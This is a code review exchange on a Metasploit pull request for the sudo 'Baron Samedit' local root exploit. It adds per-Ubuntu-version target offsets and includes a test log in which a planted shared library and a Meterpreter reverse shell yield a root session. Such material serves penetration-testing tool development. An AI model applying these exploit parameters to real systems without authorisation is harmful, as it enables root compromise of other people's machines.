modules/exploits/linux/local/sudo_baron_samedit.rb

```diff
@@ -46,12 +46,13 @@ def initialize(info = {})
         ],
         'Targets'        =>
           [
+            [ 'Automatic', { } ],
+            [ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 200 ], version_fingerprint: /^Ubuntu 20\.04/ } ],
+            [ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 18\.04/  } ],
```

Comment:
```suggestion
            [ 'Ubuntu 19.04 x64 (sudo v1.8.27, libc v2.29)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 19\.04/  } ],
            [ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 18\.04/  } ],
```

https://github.com/rapid7/metasploit-framework/pull/14715#issuecomment-777915993

Reply:
Tested and added, thanks.

```
msf6 exploit(linux/local/sudo_baron_samedit) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. sudo 1.8.27 is a vulnerable build.
[*] Using automatically selected target: Ubuntu 19.04 x64 (sudo v1.8.27, libc v2.29)
[*] Writing '/tmp/libnss_eA/iHj0ml8p .so.2' (564 bytes) ...
[*] Sending stage (3008420 bytes) to 192.168.159.59
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.59:45736) at 2021-02-12 10:06:17 -0500
[+] Deleted /tmp/DB5LNMhfq
[+] Deleted /tmp/libnss_eA/iHj0ml8p .so.2
[+] Deleted /tmp/libnss_eA

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter >
```